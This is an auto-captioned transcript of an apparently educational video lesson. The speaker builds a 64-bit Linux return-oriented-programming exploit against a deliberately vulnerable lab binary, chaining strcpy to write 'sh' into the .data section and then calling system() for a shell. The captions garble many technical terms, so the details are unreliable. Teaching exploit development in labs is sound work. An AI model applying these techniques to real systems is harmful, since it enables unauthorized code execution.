1 00:00:00,570 --> 00:00:02,280 All right, let's check if I'm recording. 2 00:00:02,310 --> 00:00:03,180 Yes, I am. 3 00:00:03,300 --> 00:00:03,810 All right. 4 00:00:03,810 --> 00:00:04,830 So welcome back. 5 00:00:04,830 --> 00:00:07,800 And we're now going to do something more advance. 6 00:00:08,220 --> 00:00:15,840 We have yet to do the RET to plot attack, but we're going to create a shell string by abusing stir 7 00:00:15,840 --> 00:00:16,590 copy. 8 00:00:17,370 --> 00:00:23,730 Before we do that, let's cover what calling conventions are for Linux x86. 9 00:00:23,730 --> 00:00:33,480 So the way that Linux x x 64 I'm sorry, I just have a lot of people annoying me right now. 10 00:00:34,080 --> 00:00:49,350 So how it happens is that in Linux use function, RTI register RC Register, RTX, register RC X register 11 00:00:49,680 --> 00:00:58,890 R eight and R nine and anything else pass the six argument is actually going to be a distance from the 12 00:00:58,890 --> 00:01:00,480 return stack pointer. 13 00:01:01,590 --> 00:01:09,240 So we're actually going to be using a hardcoded star copy function or string copy function to pop a 14 00:01:09,240 --> 00:01:11,070 shell on this vulnerable binary. 15 00:01:11,460 --> 00:01:19,470 And we're going to be copying the words S and H into the right data segment and then calling system 16 00:01:20,760 --> 00:01:23,820 on the RTI register to invoke our root level shell. 17 00:01:23,820 --> 00:01:27,270 So this is where it's going to get a little bit more difficult. 18 00:01:27,480 --> 00:01:34,590 So we're going to go back to our session and then we're going to do GDB three vol dash queue. 19 00:01:36,490 --> 00:01:40,370 Then press r let's just x out of control. 20 00:01:40,390 --> 00:01:43,060 See the map. 21 00:01:43,420 --> 00:01:44,320 Oh, my God. 22 00:01:44,560 --> 00:01:45,040 No, sorry. 23 00:01:45,130 --> 00:01:48,610 Just somebody on discord to load the. 24 00:01:49,200 --> 00:01:51,230 The address range of our binary. 25 00:01:51,250 --> 00:01:56,170 We only care about what starts here and what starts stops here. 26 00:01:56,380 --> 00:02:08,470 So we're going to do set start and then click on the end, set, end. 27 00:02:11,830 --> 00:02:17,970 And we're going to search for our strings, which is basically the characters S and H. 28 00:02:17,980 --> 00:02:30,520 So what you do, debug or Jeff, is search pattern s, start dash and so make sure you put the C variables. 29 00:02:31,750 --> 00:02:33,820 I'm just going to stop discord right now. 30 00:02:38,410 --> 00:02:39,370 Oh, my God. 31 00:02:45,310 --> 00:02:45,500 Okay. 32 00:02:45,640 --> 00:02:46,510 Quit Discord. 33 00:02:46,630 --> 00:02:47,050 Finally. 34 00:02:48,100 --> 00:02:50,450 And then we're going to enter the binary three volume. 35 00:02:53,350 --> 00:02:56,560 So we have the character SE in this memory address. 36 00:02:57,430 --> 00:03:02,020 So we're going to put this and we're going to save in our script. 37 00:03:02,020 --> 00:03:05,320 So from home import star. 38 00:03:08,050 --> 00:03:10,510 Let's see a temp three pi. 39 00:03:13,990 --> 00:03:20,650 This address equals this, and then we're going to do it again for the H character. 40 00:03:23,530 --> 00:03:27,660 So we've found an H right here somewhere, right? 41 00:03:27,670 --> 00:03:31,360 H address equals this. 42 00:03:40,280 --> 00:03:43,370 Once again, we're going to go back into our function. 43 00:03:43,760 --> 00:03:49,310 So we're going to go into our debugger and we're going to do disassemble show date. 44 00:03:53,850 --> 00:03:57,630 And when I disassemble this memory address, you notice that is different. 45 00:04:00,120 --> 00:04:03,500 And I just want to point out that the so called right here. 46 00:04:03,510 --> 00:04:04,320 All right. 47 00:04:04,710 --> 00:04:10,680 This address may be different depending on what kind of virtual machine, an app that you're running 48 00:04:10,680 --> 00:04:11,310 this on. 49 00:04:11,580 --> 00:04:15,330 So just take note that this address right here could be different. 50 00:04:15,330 --> 00:04:19,560 But in our case, the this call is actually the same address. 51 00:04:19,560 --> 00:04:23,010 So we're going to do this call equals this. 52 00:04:27,910 --> 00:04:37,510 And finally we need a section to read or to write our SE and H into our rock chain. 53 00:04:38,530 --> 00:04:39,910 So let's go back. 54 00:04:40,300 --> 00:04:41,740 We're going to split the screen. 55 00:04:42,730 --> 00:04:44,010 We're going to read L. 56 00:04:44,800 --> 00:04:47,810 s/3 vol. 57 00:04:49,800 --> 00:04:50,640 Selfie. 58 00:04:51,300 --> 00:04:54,960 All I did was press control Z, by the way, Control Z and it zooms. 59 00:04:55,410 --> 00:05:02,220 So notice that the data section right here, which starts at this memory address, is writable. 60 00:05:03,000 --> 00:05:12,060 So we can actually use this and insert our shell function or our shell variable. 61 00:05:12,330 --> 00:05:19,770 So we can call this a write two equals number hex that. 62 00:05:27,740 --> 00:05:32,060 And we also have a unused stored copy function. 63 00:05:32,060 --> 00:05:38,420 So we're going to go back, disassemble on, used 64 00:05:41,600 --> 00:05:43,250 and of course, store copy. 65 00:05:46,090 --> 00:05:51,250 Now make sure to disassemble this memory address, which is disassemble here. 66 00:05:53,310 --> 00:05:58,350 And note that a copy is called at this memory address, which is actually exactly the same. 67 00:05:58,360 --> 00:06:04,590 But like I said before, depending on your compiler version, this could be a different address. 68 00:06:04,590 --> 00:06:07,470 So be wary of that. 69 00:06:09,510 --> 00:06:13,740 So of use stir copy func equals this. 70 00:06:20,190 --> 00:06:26,490 And we're also going to have like an issue of ROPPER because when we search for our gadgets in ROPPER, 71 00:06:26,490 --> 00:06:33,120 so control be shift five ROPPER, three ROPPER file three bones. 72 00:06:34,140 --> 00:06:43,650 We're not going to find like a proper pop RSI instruction, but we will find a proper pop RTI instruction. 73 00:06:44,040 --> 00:06:48,210 So first we want to go search for search def one return. 74 00:06:49,020 --> 00:06:52,470 This would be nice to use rat equals. 75 00:06:55,230 --> 00:06:58,470 We're also look for search pop RTI. 76 00:07:02,870 --> 00:07:09,320 Pop RTI and search pop. 77 00:07:09,350 --> 00:07:16,790 RC So this is the issue I'm talking about is that we have an additional instruction. 78 00:07:16,790 --> 00:07:25,250 AR 15 We do not have any other ways of having a pop or a side instruction alone, but we will have a 79 00:07:25,250 --> 00:07:26,000 workaround for that. 80 00:07:26,000 --> 00:07:27,920 So let's just copy this memory address. 81 00:07:30,800 --> 00:07:36,980 Pop our CI pop AR 15 return. 82 00:07:41,460 --> 00:07:43,500 With these gadgets in hand. 83 00:07:43,500 --> 00:07:52,320 What you want to do is that you need to write a dummy address because a 64 bit register can hold eight 84 00:07:52,320 --> 00:07:53,940 bytes or 64 bits. 85 00:07:53,940 --> 00:07:57,330 So 64 divided by eight is eight bytes. 86 00:07:57,600 --> 00:08:02,850 So we're going to write a dummy address, turn it to bytes. 87 00:08:07,110 --> 00:08:08,940 Multiply by eight characters. 88 00:08:10,710 --> 00:08:15,210 We're going to use the same buffer overflow vulnerability that we have before. 89 00:08:16,500 --> 00:08:23,730 Remember this one overwrites the return base pointer above plus equals B. 90 00:08:26,540 --> 00:08:30,290 Ex 42 or if it are just loops x 42 91 00:08:33,500 --> 00:08:47,870 times eight overwrites return a stack pointer and now we're going to copy the character s to the data 92 00:08:47,870 --> 00:08:48,560 section. 93 00:08:50,140 --> 00:08:55,550 Sort of add to our buffer or rock chain tack 64 return. 94 00:08:55,570 --> 00:09:09,400 Remember this is what's happened is struct pack pack little Indian 64 bit return address from here. 95 00:09:12,910 --> 00:09:23,350 So buff again plus equals P60 for top RTI return above plus equals P 6 to 4. 96 00:09:23,770 --> 00:09:25,090 Right two. 97 00:09:25,780 --> 00:09:35,080 That's our location instead of the data segment of the data segment to write the characters. 98 00:09:35,770 --> 00:09:36,790 sh2. 99 00:09:42,280 --> 00:09:47,740 Above plus equals p capacity for se address. 100 00:09:49,860 --> 00:09:58,710 Write the character s data buff plus equals dummy. 101 00:10:01,190 --> 00:10:03,560 Above plus equals p64. 102 00:10:05,180 --> 00:10:06,740 Stir copy func. 103 00:10:12,110 --> 00:10:18,290 Now we're going to copy the Chapter two data to the data segment. 104 00:10:19,250 --> 00:10:20,420 So we're going to repeat it. 105 00:10:20,420 --> 00:10:25,610 So maybe I did not explain this enough in ROP training, but you can reuse your gadgets as much as you 106 00:10:25,610 --> 00:10:29,090 want, as long as you can fulfill the correct calling conventions. 107 00:10:31,340 --> 00:10:33,770 So what we're going to do is. 108 00:10:35,350 --> 00:10:46,060 Both plus equals taxi for pop rti ret buff plus equals P 64. 109 00:10:47,110 --> 00:10:47,620 Right. 110 00:10:47,770 --> 00:10:50,780 Two plus hex one. 111 00:10:50,800 --> 00:11:04,000 Now, the reason why we're doing this is we are seeking plus one fight because we don't want to overwrite 112 00:11:05,410 --> 00:11:09,670 our s character in the data segment. 113 00:11:11,080 --> 00:11:14,860 So we're going to move past the right to location. 114 00:11:15,850 --> 00:11:21,040 So we're just adding one to this character right here so we can put our H right there. 115 00:11:23,170 --> 00:11:32,230 Finally we're going to use our P 64 pop RC Pop R 15 return. 116 00:11:38,010 --> 00:11:41,820 And then we're finally pushing our h character 117 00:11:44,640 --> 00:11:52,080 plus plus equals dummy buff plus equals p62 for coffee. 118 00:11:55,040 --> 00:11:59,330 And now we have to call our shell. 119 00:12:00,020 --> 00:12:01,010 Well, if the system functions. 120 00:12:01,010 --> 00:12:05,440 So now we're going to call system RTI. 121 00:12:07,130 --> 00:12:16,910 So it's going to be five plus equals attack 64 pop RTI ret buff plus equals. 122 00:12:18,840 --> 00:12:19,840 Is the floor. 123 00:12:19,990 --> 00:12:21,040 Right to. 124 00:12:24,720 --> 00:12:28,770 Above plus equals p 64 system. 125 00:12:30,990 --> 00:12:34,440 And then we're just the standard standard in standard out. 126 00:12:34,650 --> 00:12:35,880 BUFFER Right. 127 00:12:36,280 --> 00:12:39,540 Buff Which means it just writes to the screen and the re directs it. 128 00:12:40,050 --> 00:12:41,580 So let's see if this exploit works. 129 00:12:41,580 --> 00:12:43,320 I may have made a mistake somewhere. 130 00:12:46,710 --> 00:12:47,790 Let's go back. 131 00:12:49,380 --> 00:12:50,910 Let's control B split. 132 00:12:56,760 --> 00:12:59,360 Nano attempt three pi. 133 00:13:06,020 --> 00:13:06,550 Let's see. 134 00:13:06,560 --> 00:13:09,710 Python three, three. 135 00:13:18,450 --> 00:13:20,370 Oh, we do have a mistake. 136 00:13:20,430 --> 00:13:21,060 Cisco. 137 00:13:28,730 --> 00:13:30,980 And attempt three. 138 00:13:39,970 --> 00:13:40,820 This won't work. 139 00:13:41,140 --> 00:13:42,200 It's less clear. 140 00:13:42,920 --> 00:13:44,300 So Python three. 141 00:13:46,130 --> 00:13:46,820 Let's see. 142 00:13:47,180 --> 00:13:48,440 Attempt three. 143 00:13:49,100 --> 00:13:56,360 Pi semicolon cat semicolon type dot three phone. 144 00:13:58,520 --> 00:14:00,410 We ask you to a date time function. 145 00:14:03,180 --> 00:14:04,410 Press enter again. 146 00:14:04,710 --> 00:14:08,100 ID okay, we have a sec. 147 00:14:08,550 --> 00:14:09,810 Let's see what's going on.